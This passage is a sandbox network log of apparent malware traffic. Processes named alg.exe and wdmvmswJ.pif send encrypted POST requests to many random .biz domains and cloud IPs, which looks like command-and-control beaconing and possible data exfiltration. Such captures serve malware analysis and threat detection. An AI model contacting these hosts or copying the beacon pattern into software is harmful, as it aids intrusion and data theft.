                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=41e81758bdb2893879014c4257be859b|173.254.250.82|1730445865|1730445865|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.8 | 49801 | 44.221.84.105 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:25.045723915 CET | 357 | OUT | POST /ymsikktgwjcaw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:25.045813084 CET | 778 | OUT | Data Raw: 86 aa f0 bd 70 36 b3 81 fe 02 00 00 85 b1 5b 57 64 6a 8d 72 43 6a 17 84 87 0b a6 0d e8 e8 e2 7b fe b4 86 d4 97 83 6d 74 43 73 3d 00 ae 0c b5 ee d5 89 4e 84 70 95 e7 cb 55 31 3f 25 59 0b 7e 9a f4 a9 9b e0 43 67 67 97 95 ad 56 7b 6a 86 e5 6d c7 5b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: p6[WdjrCj{mtCs=NpU1?%Y~CggV{jm[ 7[O#l,]+(K;)Z<"VP@\VY6$T0hv,4~n2E-jA/J;YA,9"
Nov 1, 2024 08:24:25.706679106 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=cd8b9fab083f6114b6bd1ccaa3ac735d|173.254.250.82|1730445865|1730445865|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.8 | 49802 | 3.254.94.185 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:25.599131107 CET | 351 | OUT | POST /rvfsblrqhy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:25.599158049 CET | 802 | OUT | Data Raw: d9 ed 93 2f 24 97 34 b0 16 03 00 00 ff 31 a5 db 48 b0 4a 94 ee 79 ce 72 ed 3a c0 d5 70 35 f3 b9 3c 9c 88 54 e0 a3 26 f8 8e 9d c3 2b c4 79 37 40 21 c8 bf e5 e3 eb f4 61 74 63 fe 38 57 58 e7 e1 17 20 0a 39 53 19 aa f7 80 23 e7 56 a5 f9 aa a1 83 7a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /$41HJyr:p5<T&+y7@!atc8WX 9S#VzFG;-O</G,D0d3j6PfO0%v)V$\F.7xd0xt(HSD2_-Iz5$Sm
Nov 1, 2024 08:24:26.563851118 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b31c4fabe272c6f55f706f6172f6e684|173.254.250.82|1730445866|1730445866|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.8 | 49803 | 18.141.10.107 | 80 | 4916 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:25.910295963 CET | 359 | OUT | POST /wiuuagnokpngbsx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:25.910295963 CET | 778 | OUT | Data Raw: c7 03 f8 4e 1b f6 8f 7a fe 02 00 00 5e 3f 6f 2d 64 7b 86 4f 52 08 50 0f 3b 80 a4 96 4e 51 bf 2c c8 fc 6a f9 c5 73 48 36 74 00 38 ef 31 a5 01 84 34 da 00 0d bb 80 53 81 c9 02 66 3f 38 00 69 48 b0 b0 fc c1 c6 77 7b 59 09 c3 21 18 52 a3 c2 a2 7b b6
Data Ascii: Nz^?o-d{ORP;NQ,jsH6t814Sf?8iHw{Y!R{0%4Ytc|E}0GV z78S&vp|; 2Cb)6x)]*wlz@l>N[+5M8 V^1Sd\
Nov 1, 2024 08:24:27.368484020 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=814916752eabbc086bbb2bdac61ff438|173.254.250.82|1730445867|1730445867|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.8 | 49804 | 85.214.228.140 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:26.607357979 CET | 354 | OUT | POST /kfmcpedbjr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:26.607384920 CET | 802 | OUT | Data Raw: 29 89 9d f4 a7 14 2e f0 16 03 00 00 79 62 dc 14 76 5c 7a 5a 61 69 c5 97 d6 ea a0 7b be 94 04 38 07 25 7a da bc c2 fa a9 10 95 41 a0 4e 56 7c 02 da 6a b9 83 a4 b9 15 de 6a 16 ff 84 74 4f 7c 6d d0 d9 4a 7c 92 4d 58 8e 35 d7 1e cb 4c e9 e4 f1 81 18
Data Ascii: ).ybv\zZai{8%zANV|jjtO|mJ|MX5L(4R)[9Y8_A~w#}$W]l=d0!Rc@LJ;X)2q\,|oMZ2[x+4_o`]IK\xhg,.W3&z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.8 | 49805 | 85.214.228.140 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:27.077306986 CET | 356 | OUT | POST /rifmhdkgmasf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:27.077476025 CET | 802 | OUT | Data Raw: 6b 5a 49 f7 6f af 63 a0 16 03 00 00 6a 93 41 c5 fc 82 04 d7 ba 39 63 75 77 dd 22 b2 46 c9 b9 42 ee e0 ae 36 3a 6e 4c 49 ea c8 8f f1 f6 fa e1 1a ba 81 67 64 e5 78 c0 f4 e6 b6 f9 55 4b 1a 37 51 ba f9 82 b4 31 ad 8e 3d 2d 81 5e 89 4d 45 fe 99 e8 d0
Data Ascii: kZIocjA9cuw"FB6:nLIgdxUK7Q1=-^MEvy[LPjuIibQH,Ga.rWx!-+W:jsi]QZ <IoUrv6H zHHYb#Vrp5lh
Nov 1, 2024 08:24:27.943753958 CET | 161 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Fri, 01 Nov 2024 07:24:27 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Nov 1, 2024 08:24:27.943802118 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        90192.168.2.84980618.246.231.120804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.573637962 CET356OUTPOST /tbncyidxtibogxq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:27.573637962 CET | 778 | OUT | Data Raw: 66 f2 b4 b1 9c 25 e2 11 fe 02 00 00 75 b3 7c af 9e 5a bb a5 1a fb e8 5b 65 2b 7a 1e 5b 0e 48 84 0f 7c cc 13 73 c0 0e 57 2d d4 35 a8 a8 37 a8 09 2b 88 cd da 10 26 13 23 7b f9 44 c6 00 73 90 c2 85 6e c8 77 61 70 41 71 d3 d2 da a5 58 4b 94 cd b7 dc
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: f%u|Z[e+z[H|sW-57+&#{DsnwapAqXK%}D%>29e,FTNMN)85r~in^1is!9CyE_cQdf'smyNiu_(l.j-m$G8LyW4
Nov 1, 2024 08:24:28.400188923 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e0d331f85eea7389c47a6836cf9f9dba|173.254.250.82|1730445868|1730445868|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.8 | 49807 | 47.129.31.212 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:27.992387056 CET | 352 | OUT | POST /eakdwqhsn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:27.992409945 CET | 802 | OUT | Data Raw: 68 27 56 32 53 02 2c bc 16 03 00 00 2d 21 38 c7 ae 8a 16 8a a0 ff 6b 93 79 18 d6 19 bd 47 f2 8f 1a 72 94 e6 7c 78 f7 1b a3 32 43 5c 4d 67 0b 3e 13 84 dc 21 1e a4 41 a1 2f 74 db 90 25 ed e6 3c 65 d1 99 32 df 05 79 42 ad f9 f8 93 fe 5d 9c e6 bf 14
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h'V2S,-!8kyGr|x2C\Mg>!A/t%<e2yB]Na!H"Z8/:E~2^M2jA6t)Cmxhk8r86[Uj?2h8^kZ>9f"#G@N\%p~V1Wo*/'Yu//|OOj
Nov 1, 2024 08:24:29.442374945 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b1025ef6775af7d205078f97d152136a|173.254.250.82|1730445869|1730445869|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.8 | 49808 | 18.208.156.248 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:28.533565998 CET | 357 | OUT | POST /bcjrqnssupbqc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:28.533608913 CET | 778 | OUT | Data Raw: d7 fc 74 03 5e 66 70 9d fe 02 00 00 ce 4f ae c3 5d 50 c9 17 82 92 48 97 14 bd 19 ff be 54 d2 6a f0 cf 8c 1e 40 2b e2 2e b8 c2 11 89 8d 69 3e 46 c7 a7 38 dd 68 85 85 33 b1 3c cc b7 62 fc 18 af 34 c8 3a a6 3f 64 0c 46 b9 ae 7f 24 44 47 40 0d 47 92
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t^fpO]PHTj@+.i>F8h3<b4:?dF$DG@G#h*q{EdDKY%oqK?7nEV'9w=v*W!G:K17W9?+v.Fx\Xb`qz0tE"i(
Nov 1, 2024 08:24:29.203380108 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=256edeced3cf5e9616feda4f93da4dbb|173.254.250.82|1730445869|1730445869|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.8 | 49809 | 13.251.16.150 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:29.329370975 CET | 346 | OUT | POST /taks HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:29.329399109 CET | 778 | OUT | Data Raw: 01 cc a5 e0 8a 6a 60 2f fe 02 00 00 cc a3 33 01 51 ae 51 06 21 24 ac 2b 55 62 eb df b9 1e cd 89 69 4a 54 38 fc 61 47 0e 25 0a 97 59 55 6c 61 91 31 e4 31 69 a9 21 ea c9 fd b8 ff 5c 44 c6 50 2f 3f 3d 14 13 25 66 52 81 32 5b 34 53 5d a8 5e bc 09 5f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: j`/3QQ!$+UbiJT8aG%YUla11i!\DP/?=%fR2[4S]^_~JSA2H}+hybkL*;r<(3S+d:r]t-EB!(|MwIpk90\};#{x]5V%gL2TBYfh&|o11/+D~
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.748615980 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a88ef51d7b5b0d9d32b6053eba3278e6|173.254.250.82|1730445870|1730445870|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.8 | 49810 | 34.211.97.45 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:29.675199986 CET | 355 | OUT | POST /qbllddvxueecww HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:29.675215960 CET | 802 | OUT | Data Raw: 30 6a b8 88 dd c2 d8 f2 16 03 00 00 5c 94 fe af bb e6 04 9d 21 26 f3 28 a3 2b 66 4d da e0 76 b4 9e 95 36 35 35 c9 46 27 2f 2b d2 f4 ca bd 51 f0 36 67 a1 7c b6 c4 c5 8e 57 cf 71 3e 4e b8 b9 0d fe ce cf b7 f2 73 57 db 1c 75 68 a2 e5 5c aa 61 3e 7f
Data Ascii: 0j\!&(+fMv655F'/+Q6g|Wq>NsWuh\a>;h*8||*<h0U?~MR^Sg)&~C%wP9c'7E [aQ:F5[^SABKpN)O]C^QZ8(tl,f%;(%WFO
Nov 1, 2024 08:24:30.511961937 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5c93d843769cf7c6d76da733fa099ca2|173.254.250.82|1730445870|1730445870|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.8 | 49812 | 47.129.31.212 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:30.561356068 CET | 353 | OUT | POST /jaypbwnkuad HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:30.561374903 CET | 802 | OUT | Data Raw: 63 e1 1a 43 7d 22 e5 75 16 03 00 00 b4 d9 a4 9b 0c 25 ff dc 25 e9 cb dd 28 2d ff c3 a5 60 d8 69 bd 6d 8f bc b4 0d 53 77 a7 b1 fc a3 ab 34 25 e1 d5 e8 de 03 09 a2 45 41 e7 a4 4c 1b 8a 5a 7c 25 a7 53 9a 5d 11 a4 64 3f 20 98 b2 34 63 d2 cb c5 e6 bd
Data Ascii: cC}"u%%(-`imSw4%EALZ|%S]d? 4cbEYGb|Wy{vGZaTA:)=W.B>x91FP!}_7SzeJGd]UwpPH7a45xG7zpk


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.8 | 49813 | 47.129.31.212 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:31.093075037 CET | 344 | OUT | POST /om HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:31.093094110 CET | 802 | OUT | Data Raw: 21 58 d3 2e 24 dd d3 c1 16 03 00 00 b0 25 1e 01 53 7c 31 cc 23 11 41 5b f4 ff 09 8a 6e cb e0 bc 06 b3 dc fa e1 cf 2b c3 e2 03 6a fa da 53 9f 62 0b 30 2d 74 0e 35 63 20 02 f5 ea 59 d9 96 0b 99 75 73 0c 0a 26 2c 6d c9 06 60 b1 7d 65 be 75 ef 40 a3
Data Ascii: !X.$%S|1#A[n+jSb0-t5c Yus&,m`}eu@023t$~L"CXecxABAXKfa71tv6=>;0\Ei-\f H4 d?)iw:$DwZ|x(zw. VEm-J=
Nov 1, 2024 08:24:32.561674118 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=22820d2eaab8110df296904ade931858|173.254.250.82|1730445872|1730445872|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.8 | 49814 | 13.251.16.150 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:31.302165031 CET | 349 | OUT | POST /cnub HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:31.302191019 CET | 778 | OUT | Data Raw: b3 fa 31 57 b4 9c 99 77 fe 02 00 00 63 ba ba 11 ea e8 65 c2 b7 b6 38 1d d7 81 13 c9 c8 75 33 56 23 ff f4 66 fa db 93 27 8b e8 e2 8e 79 25 8b c9 2e eb 5a 1b cb 1e 44 d6 84 57 1b dc 9c b6 70 84 90 30 ba 89 4c 67 45 47 2f 0f 0d e9 45 5c fe 78 43 76
Data Ascii: 1Wwce8u3V#f'y%.ZDWp0LgEG/E\xCvw>D?9Vs&C\2{5X*&Ws};`.{Q8gOIWEVPh)fg pT_3K;U?MSWK]F9{7C@gx|
Nov 1, 2024 08:24:32.736144066 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=207136468128fafd5992cbbde241902f|173.254.250.82|1730445872|1730445872|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
